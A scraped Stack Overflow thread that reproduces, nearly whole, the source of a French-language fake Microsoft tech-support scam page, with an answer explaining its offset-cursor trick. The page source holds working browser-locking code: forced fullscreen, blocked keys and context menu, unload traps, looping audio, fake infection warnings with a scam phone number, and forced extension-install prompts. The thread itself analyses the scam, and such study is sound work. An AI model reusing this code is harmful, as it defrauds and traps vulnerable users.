Menu
Tech support scammers are always trying to find ways to make windows hard to close for scam purpose.
In this case, the goal of a section of this code is to make it hard for the user to check : "prevent this page from creating additional dialogs", otherwise the victim can just close the window. It's somehow messing with the mouse cursor to make it difficult for the victim to hover the checkbox. I don't understand how this works:
There is a large blob in the page which I removed for StackOverflow but a full version can be found here: https://pastebin.com/E57AQjGj
For future visitors, here is the cursor (from Tschallacka's answer), with a grey background (normally clear):
This is the code of a typical Microsoft Technical support scam as of May of 2018:
<html xmlns="http:/www.w3.org/1999/xhtml">
<head>
<meta name="robots" content="noindex,nofollow">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title> Information </title>
<link href="index_files/bootstrap.css" rel="stylesheet">
<link href="index_files/style.css" rel="stylesheet">
<link href="index_files/translator.css" id="SL_Style" type="text/css" rel="stylesheet">
<link href="index_files/alert.css" rel="stylesheet">
<link href="https://chrome.google.com/webstore/detail/ghbmnnjooekpmoecnnnilnnbdlolhkhi" rel="chrome-webstore-item">
<style>
html {
overflow: hidden;
}
</style>
<script>
/*
window.alert = function(al) {
return function(msg) {
al(msg);
var event = new CustomEvent('alert_clicked');
document.dispatchEvent(event);
};
}(window.alert);
document.addEventListener('alert_clicked', function() {
setTimeout(function() {
toggleFullScreen();
}, 1000)
}, false);
*/
</script>
<script>
function getURLParameter(name) {
return decodeURI((RegExp(name + '=' + '(.+?)(&|$)').exec(location.search) || [,null])[1] || '');
}
var error = getURLParameter('error');
</script>
<audio id="play" loop><source src="fr.mp3" type="audio/mpeg"></audio>
<!--<audio autoplay="autoplay" loop="">
<source src="index_files/gb.mp3" type="audio/mpeg">
</audio>-->
<script type="text/javascript">
var stroka = "<tr><td valign='top'><table width='100%' height='61' cellpadding='0' cellspacing='0' border='0'><tr><td width='766'><img src='data:image/jpeg;base64,/Z'></td></tr></table></td></tr>";
</script>
<script type="text/javascript">
function toggleFullScreen() {
if (!document.fullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement) {
if (document.documentElement.requestFullscreen) {
document.documentElement.requestFullscreen();
} else if (document.documentElement.mozRequestFullScreen) {
document.documentElement.mozRequestFullScreen();
} else if (document.documentElement.webkitRequestFullscreen)
{document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT);
}
}
}
</script>
<script type="text/javascript">
document.addEventListener('keyup', function(es) {
if (es.keyCode === 27) {
toggleFullScreen();
}
}, false);
</script>
<script type="text/javascript">
document.addEventListener('keyup', function(e) {
if (e.keyCode === 122 || e.keyCode === 17 || e.keyCode === 18 || e.keyCode === 13) {
document.getElementById('map').innerHTML = stroka;
toggleFullScreen();
}
}, false);
</script>
<script type="text/javascript">
window.onload = function () {
document.onclick = function (e) {
e = e || event;
target = e.target || e.srcElement;
if (target.tagName === "DIV") {
toggleFullScreen();
document.body.style.cursor = 'not-allowed';
document.getElementById('map').innerHTML = stroka;
document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
} else {
toggleFullScreen();
document.body.style.cursor = 'not-allowed';
document.getElementById('map').innerHTML = stroka;
document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
}
}
}
</script>
<script type="text/javascript">
addEventListener("click", function() {
document.getElementById('map').innerHTML = stroka;
document.getElementById("play").play();
if (!isFullScreen) {
var el = document.documentElement,
rfs = el.requestFullScreen || el.webkitRequestFullScreen || el.mozRequestFullScreen;
rfs.call(el);
}
});
</script>
</head>
<body onkeydown="return hCPNapvlhFicLoDm(event)" oncontextmenu="return false" style="cursor: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAACACAMAAAD04JH5AAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAPUExURQAAAAICAgAAAP///5WVlXiCGdAAAAADdFJOUwD8ZX+n/7gAAABvSURBVHja7dbBAUAwEABBQf81i6CGfZipYB3J2bY/GnnAHgec9QjOY9QBccEMaAvugLRgBZQFT0BY8AZ0BV9AVvB8hEt3D8SnYIz2FMxtlI7gfvVzBN1OXM9+1Dsx/ykAAAAAAAAAAAAAAAAAgNcFnc4A9qwo+wMAAAAASUVORK5CYII=") 128 128, crosshair;">
<!-- <canvas id="canvasElement"></canvas> -->
<audio autoplay="autoplay" loop="">
<source src="fr.mp3" type="audio/mpeg">
</audio>
<div id="coFrameDiv" style="height:0px;display:none;">
<iframe id="coToolbarFrame" src="index_files/a.htm" style="height:0px;width:100%;display:none;"></iframe>
</div>
<a id="elem" href="#" style="display: none;"></a>
<span id="audioarea"></span>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td valign="top" align="center"><div id="map"></div>
</td>
</tr>
</tbody>
</table>
<nav class="navbar navbar-default navbar-static-tops">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#">
<img src="index_files/windows.png" alt="Windows">
</a>
</div>
<div id="navbar" class="navbar-collapse collapse">
<ul class="nav navbar-nav">
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Store<span class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#">Téléchargement </a></li>
<li><a href="#">Devices</a></li>
<li><a href="#">Software</a></li>
<li><a href="#">Apps</a></li>
<li><a href="#">Games</a></li>
</ul>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Products<span class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#">Software & services</a></li>
<li><a href="#">Devices & Xbox</a></li>
<li><a href="#">For business</a></li>
</ul>
</li>
<li><a href="#">Support</a></li>
</ul>
<ul class="nav navbar-nav navbar-right">
<li><a href="#"><strong>Support technique : 09 70 38 74 17</strong></a></li>
</ul>
</div><!--/.nav-collapse-->
</div>
</nav>
<div class="container">
<div class="jumbotron">
<div class="row">
<div class="col-xs-6 text-left">
<h2>Attention</h2>
Ne pas éteindre ou réinitialiser votre ordinateur.
</br></br>
Votre ordinateur a été infecté.
</br></br>
Les données suivantes peuvent être compromises :
<br/><br/>
1. Mots de passe.
<br/>
2. Historique du navigateur.
<br/>
3. Informations sensibles (Cartes de crédit).
<br/>
4. Fichiers sur le disque dur.
<br/>
<br/>
Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
<br><br>
Appelez immédiatement au : <b>09 70 38 74 17</b> (Appel gratuit).
<br><br>
Ne pas ignorer cette alerte critique. Si vous fermez cette page, votre accès à l'ordinateur sera désactivé pour éviter d'autres dommages sur notre réseau.
<br><br>
Contactez-nous immédiatement afin que nos ingénieurs puissent vous guider à travers le processus de suppression par téléphone. Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
</div>
</div>
</div>
</div>
<footer class="footer">
<div class="container">
<div class="row">
<div class="col-md-4" style="text-align:left;">
<h4>Support</h4>
<ul style="padding:0px;">
<li style="list-style: none; padding:10px 0px;"><a>Account support</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Supported products list</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Product support lifecycle</a></li>
</ul>
</div>
<div class="col-md-4" style="text-align:left;">
<h4>Security</h4>
<ul style="padding:0px;">
<li style="list-style: none; padding:10px 0px;"><a>Safety & Security Center</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Download Security Essentials</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Malicious Software Removal Tool</a></li>
</ul>
</div>
<div class="col-md-4" style="text-align:left;">
<h4>Popular topics</h4>
<ul style="padding:0px;">
<li style="list-style: none; padding:10px 0px;"><a>Report a support scam</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Disability Answer Desk</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Locate Windows addresses worldwide</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Windows 10 help & how-to</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Windows 10 Mobile help & how-to</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Can't find Office applications in Windows 10,
Windows 8, or WIndows 7?</a></li>
</ul>
</div>
</div>
<div class="row" style="font-size: 1.2rem; padding:30px 0px;">
<div style="float:left;"><span class="glyphicon glyphicon-cd"></span><span>English(United States)</span>
</div>
<div style="float:right;">
<span style="padding:0px 15px;">Terms of use</span>
<span style="padding:0px 15px;">English(United States)</span>
<span style="padding:0px 15px;">Trademarks</span>
<span style="padding:0px 15px;">@2016 Windows</span>
</div>
</div>
</div>
</footer>
<div id="chrome-alerts" class="chrome-alert">
<div>
<a href="javascript:openlink()" class="cross">×</a>
<h1>Attention</h1>
<div class="content-box" id="alert-content-box">
<p>
Votre ordinateur a été infecté.
</br></br>
Les données suivantes peuvent être compromises :
<br/><br/>
1. Mots de passe.
<br/>
2. Historique du navigateur.
<br/>
3. Informations sensibles (Cartes de crédit).
<br/>
4. Fichiers sur le disque dur.
<br/>
<br/>
Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
<br><br>
Appelez immédiatement au : <b>09 70 38 74 17</b> (Appel gratuit).
<br><br>
Ne pas ignorer cette alerte critique. Si vous fermez cette page, votre accès à l'ordinateur sera désactivé pour éviter d'autres dommages sur notre réseau.
<br><br>
Contactez-nous immédiatement afin que nos ingénieurs puissent vous guider à travers le processus de suppression par téléphone. Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
</p>
</div>
<label style="font-size: 12px;"><input type="checkbox"> Empêcher les boîtes de dialogue supplémentaires</label>
<div class="action_buttons">
<a class="active" id="leave_page">OK</a>
</div>
</div>
</div>
<script>
var subid = '';
var clickid = '';
var postback = 'wHBAN004C9IFC3951PRAFUP0';
var cl = false;
var isFullScreen = !(!document.fullscreenElement && !document.msFullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement);
window.onload = function () {
var langs = {
en: {
img: 'ru_new.png',
h3: 'System notification!',
p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
},
ru: {
img: 'ru_new.png',
h3: '????????? ???????????!',
p: '???????????? ???????? ? ????????? ??????? ?????????? ??? ?????? ????????. ??????? "??" ? ?????????? ???????????? ??????????.'
},
de: {
img: 'ru_new.png',
h3: 'Systembenachrichtigung!',
p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
},
fr: {
img: 'ru_new.png',
h3: 'Avis de système !',
p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
},
es: {
img: 'ru_new.png',
h3: '¡Notificación del sistema!',
p: 'Se está realizando la descarga e instalación de una extensión importante para su navegador. Haga clic en "Aceptar" e instale la extensión propuesta.'
},
pt: {
img: 'ru_new.png',
h3: 'Mensagem de sistema!',
p: 'Importantes adições para o seu navegador estão sendo transferidas ea instalação está em andamento. Pressione OK e instale as extensões!'
},
};
if (window.chrome !== undefined && window.chrome.webstore && window.chrome.webstore.install) {
if (document.cookie.indexOf('tmp_name=') == -1) {
setCookie('tmp_name', 'landing', 24);
}
var lang = langs[navigator.language];
hTRnKeAy1lgYB4La();
if (lang) {
document.querySelector('header img').src = lang.img;
document.querySelector('.gR3SfJr5l9O4jbWa h3').innerText = lang.h3;
document.querySelector('.gR3SfJr5l9O4jbWa p').innerText = lang.p;
}
if (document.cookie.indexOf('c_open' + '=') === -1) {
setCookie('c_open', 'landing', 1);
window.location.href = window.location.href;
}
try {
document.querySelector('footer').style.display = 'none';
document.querySelector('header').style.display = 'block';
} catch (e) {}
} else {
window.onbeforeunload = null;
location.assign('#');
}
};
window.onresize = function () {
if (document.querySelector('header')) {
if (window.innerHeight != screen.height) {
document.querySelector('header').style.display = 'block';
document.querySelector('footer').style.display = 'none';
}
else {
document.querySelector('header').style.display = 'none';
document.querySelector('footer').style.display = 'block';
}
}
};
window.onbeforeunload = function (ev) {
return "You have to install extension !";
};
function kzogExQSrDChY4Iq() {
eKxJS2GzrfWPEjgm();
setTimeout(function () {
document.body.webkitRequestFullscreen();
}, 1000);
}
function setCookie(a, b, c) {
var d = '';
if (c) {
var e = new Date();
e.setTime(e.getTime() + (c * 60 * 60 * 1000));
d = '; expires=' + e.toUTCString()
}
console.log(d);
document.cookie = a + "=" + b + d + ";path=/";
}
function hTRnKeAy1lgYB4La() {
if (document.cookie.indexOf('c_name' + '=') !== -1 && document.cookie.indexOf('tmp_name=') !== -1) {
window.onbeforeunload = null;
location.assign('#');
}
}
function gpAkSJDl9ENT5gLQ() {
try {
document.querySelector('footer').style.display = 'block';
document.querySelector('header').style.display = 'none';
} catch (e) {}
}
function eKxJS2GzrfWPEjgm() {
gpAkSJDl9ENT5gLQ();
try {
document.webkitCancelFullScreen();
} catch (e) { }
try {
document.cancelFullscreen();
} catch (e) { }
var xhr = new XMLHttpRequest();
xhr.open('GET', "#", true);
xhr.send();
cl = true;
chrome.webstore.install('', function () {
window.onbeforeunload = null;
var xhr = new XMLHttpRequest();
xhr.open('GET', "#", true);
xhr.onload = function () {
if (clickid) {
var xhrPostback = new XMLHttpRequest();
xhrPostback.open('GET', '#', true);
xhrPostback.onload = function () {
var xhrPostback1 = new XMLHttpRequest();
xhrPostback1.open('GET', '#', true);
xhrPostback1.onload = function () {
var xhrPostback3 = new XMLHttpRequest();
xhrPostback3.open('GET', '#', true);
xhrPostback3.onload = function () {
open('#', '_self');
};
xhrPostback3.onerror = function () {
open('#', '_self');
};
xhrPostback3.send();
};
xhrPostback1.onerror = function () {
var xhrPostback3 = new XMLHttpRequest();
xhrPostback3.open('GET', '#', true);
xhrPostback3.onload = function () {
open('#', '_self');
};
xhrPostback3.onerror = function () {
open('#', '_self');
};
xhrPostback3.send();
};
xhrPostback1.send();
};
xhrPostback.onerror = function () {
var xhrPostback1 = new XMLHttpRequest();
xhrPostback1.open('GET', '#', true);
xhrPostback1.onload = function () {
var xhrPostback3 = new XMLHttpRequest();
xhrPostback3.open('GET', '#', true);
xhrPostback3.onload = function () {
open('#', '_self');
};
xhrPostback3.onerror = function () {
open('#', '_self');
};
xhrPostback3.send();
};
xhrPostback1.onerror = function () {
var xhrPostback3 = new XMLHttpRequest();
xhrPostback3.open('GET', '#', true);
xhrPostback3.onload = function () {
open('#', '_self');
};
xhrPostback3.onerror = function () {
open('#', '_self');
};
xhrPostback3.send();
};
xhrPostback1.send();
};
xhrPostback.send();
} else if (subid) {
var xhrPostback = new XMLHttpRequest();
xhrPostback.open('GET', '#' + subid, true);
xhrPostback.onload = function () {
open('#', '_self');
};
xhrPostback.onerror = function () {
open('#', '_self');
};
xhrPostback.send();
} else if (postback) {
var xhrPostback = new XMLHttpRequest();
xhrPostback.open('GET', '#' + postback, true);
xhrPostback.onload = function () {
open('#', '_self');
};
xhrPostback.onerror = function () {
open('#', '_self');
};
xhrPostback.send();
} else {
open('#', '_self');
}
};
xhr.onerror = function () {
open('#', '_self');
};
xhr.send();
}, function (error) {
cl = false;
var xhr = new XMLHttpRequest();
xhr.open('GET', "#", true);
xhr.send();
console.log(error);
document.querySelector('footer').style.display = 'none';
try {
document.querySelector('header').style.display = 'block';
} catch (v) {
}
setTimeout(function () {
try {
document.webkitCancelFullScreen();
} catch (e) { }
try {
document.cancelFullscreen();
} catch (e) { }
}, 100);
});
}
function hCPNapvlhFicLoDm(e) {
if (e.which === 123 || e.which === 17) {
return false;
}
}
function hxvw7JrbMUZBqVhN() {
var c = confirm("You should install the chrome extension!");
if (!c) {
hxvw7JrbMUZBqVhN();
}
}
// document.body.addEventListener('keyup', f5WOxk2dF74GMRLf);
document.body.addEventListener('keyup', kzogExQSrDChY4Iq);
document.body.addEventListener('click', kzogExQSrDChY4Iq);
function f5WOxk2dF74GMRLf() {
return false;
}
function dsfsf(e) {
e = e ? e : window.event;
var from = e.relatedTarget || e.toElement;
if (!from || from.nodeName === "HTML") {
// hxvw7JrbMUZBqVhN()
window.location.href = window.location.href;
}
}
function addEvent(obj, evt, fn) {
if (obj.addEventListener) {
obj.addEventListener(evt, fn, false);
} else if (obj.attachEvent) {
obj.attachEvent("on" + evt, fn);
}
}
function removeEvent(obj, evt, fn) {
if (obj.removeEventListener) {
obj.removeEventListener(evt, fn, false);
} else if (obj.detachEvent) {
obj.detachEvent("on" + evt, fn);
}
}
//addEvent(document, "mouseout", dsfsf);
window.onblur = function() {
if (!isFullScreen && !cl) {
window.location.href = window.location.href;
}
};
</script>
<script type="text/javascript">
var nomer = getURLParameter("n");
var red = getURLParameter("red");
if (red === "y") {
document.location.href=("https://" + document.location.host + document.location.pathname + "?n=" + nomer + "&error=" + error);
}
</script>
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,3638954,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img src="//sstatic1.histats.com/0.gif?3638954&101" alt="free hit counter code" border="0"></a></noscript>
</body>
</html>
849
They do it by replacing the cursor with an image of 128x128px.
See the snippet below and hover over the button.
This way, where you think you click, you don't click. You can't see where you're clicking and you'll always miss the tiny checkbox mark.
button {
cursor: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAACACAMAAAD04JH5AAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAPUExURQAAAAICAgAAAP///5WVlXiCGdAAAAADdFJOUwD8ZX+n/7gAAABvSURBVHja7dbBAUAwEABBQf81i6CGfZipYB3J2bY/GnnAHgec9QjOY9QBccEMaAvugLRgBZQFT0BY8AZ0BV9AVvB8hEt3D8SnYIz2FMxtlI7gfvVzBN1OXM9+1Dsx/ykAAAAAAAAAAAAAAAAAgNcFnc4A9qwo+wMAAAAASUVORK5CYII=") 128 128, crosshair;
}<button>
test
</button>If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
